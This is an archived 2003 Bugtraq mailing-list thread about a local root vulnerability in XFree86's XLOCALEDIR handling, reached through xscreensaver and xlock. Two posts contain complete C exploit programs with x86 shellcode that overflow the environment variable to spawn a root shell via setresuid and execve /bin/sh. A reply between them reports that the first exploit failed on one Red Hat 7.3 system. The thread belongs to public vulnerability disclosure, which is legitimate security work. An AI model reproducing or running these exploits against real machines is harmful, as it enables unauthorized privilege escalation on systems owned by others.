92958 2003-03-06 21:41 /52 rader/ Angelo Rosiello <guilecool@usa.com>
Importerad: 2003-03-06 21:41 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3863>
Ärende: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
I think you don't need other comments:
/*
**
** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
**
** deka is leet brother, thank you :>
** MAIL: guilecool@usa.com
**
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define RETADDR 0xbfffdf20 //change it if u need
char shellcode[] =
"\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
"\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
"\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
"\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
"\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
"\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
"\xc0\x40\xcd\x80";
int main()
{
char buf[4076];
unsigned long retaddr = RETADDR;
memset(buf, 0x0, 4076);
memset(buf, 0x41, 4072);
memcpy(buf+2076, &retaddr, 0x4);
setenv("XLOCALEDIR", buf, 1);
memset(buf, 0x90, 4072);
memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
(shellcode));
setenv("HAXHAX", buf, 1);
execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);
}
(92958) /Angelo Rosiello <guilecool@usa.com>/-------
93130 2003-03-07 18:36 /27 rader/ Steven Leikeim <steven@enel.ucalgary.ca>
Importerad: 2003-03-07 18:36 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3874>
Kommentar till text 92958 av Angelo Rosiello <guilecool@usa.com>
Ärende: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
On Thu, Mar 06, 2003 at 06:26:41PM -0000, Angelo Rosiello wrote:
>
> I think you don't need other comments:
>
> /*
> **
> ** Tested on rh 7.3 using XFree86
> ** xscreensaver vulnerability
> ** AUTHORS: Angelo Rosiello (Guilecool) & deka
> ** REQUIRES: X must be run!
> ** EFFECTS: local root exploit!
> **
Oddly enough, this does NOT work on my RedHat 7.3 installation. I
have the default xscreensaver RPM installed (xscreensaver-3.33-4).
When I run this, xscreensaver DOES dump core, however, xscreensaver
is not suid root and so will not itself give a root exploit. Perhaps
there is an expected interaction with the X server (which is running
as root) but this is not clear from Angelo's message.
Steven Leikeim
Department of Electrical and Computer Engineering
University of Calgary
(93130) /Steven Leikeim <steven@enel.ucalgary.ca>/(Ombruten)
93143 2003-03-07 22:42 /16 rader/ Inode <inode@mediaservice.net>
Importerad: 2003-03-07 22:42 av Brevbäraren
Extern mottagare: Angelo Rosiello <guilecool@usa.com>
Mottagare: Bugtraq (import) <3884>
Ärende: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
Hi all,
exploit attached.
Comments are welcome.
Sincerely,
+-------------------------------------------------------------------+
| Agazzini Maurizio Tel: +39-011-32.72.100 |
| Security Analyst Fax: +39-011-32.46.497 |
| @ Mediaservice.net S.R.L. D.S.D. Data Security Division |
| |
| PGP Key : http://www.wayreth.eu.org/Inode.asc |
| Disclaimer: http://@Mediaservice.net/disclaimer |
+-------------------------------------------------------------------+
(93143) /Inode <inode@mediaservice.net>/------------
Bilaga (text/plain) i text 93144
93144 2003-03-07 22:42 /73 rader/ Inode <inode@mediaservice.net>
Bilagans filnamn: "xfree_4.2_exploit.c"
Importerad: 2003-03-07 22:42 av Brevbäraren
Extern mottagare: Angelo Rosiello <guilecool@usa.com>
Mottagare: Bugtraq (import) <3885>
Bilaga (text/plain) till text 93143
Ärende: Bilaga (xfree_4.2_exploit.c) till: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
/*
Original exploit:
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC
This exploit is a modified version of the original oC-localX.c
built to work without any offset.
Some distro have the file: /usr/X11R6/bin/dga +s
This program isn't exploitable because it drops privileges
before running the Xlib function vulnerable to this overflow.
This exploit works on linux x86 on all distro.
Tested on:
- Slackware 8.1 ( xlock, xscreensaver, xterm)
- Redhat 7.3 ( manual +s to xlock )
- Suse 8.1 ( manual +s to xlock )
by Inode <inode@mediaservice.net>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static char shellcode[] =
/* setresuid(0,0,0); */
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
/* /bin/sh execve(); */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
/* exit(0); */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
#define ALIGN 0
int main(int argc, char **argv)
{
char buffer[6000];
int i;
int ret;
char *env[3] = {buffer,shellcode, NULL};
int *ap;
strcpy(buffer, "XLOCALEDIR=");
printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");
if( argc != 3 )
{
printf(" Usage: %s <full path> <name>\n",argv[0]);
printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
return 1;
}
ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;
ap = (int *)( buffer + ALIGN + strlen(buffer) );
for (i = 0; i < sizeof(buffer); i += 4)
*ap++ = ret;
execle(argv[1], argv[2], NULL, env);
return(0);
}
(93144) /Inode <inode@mediaservice.net>/------------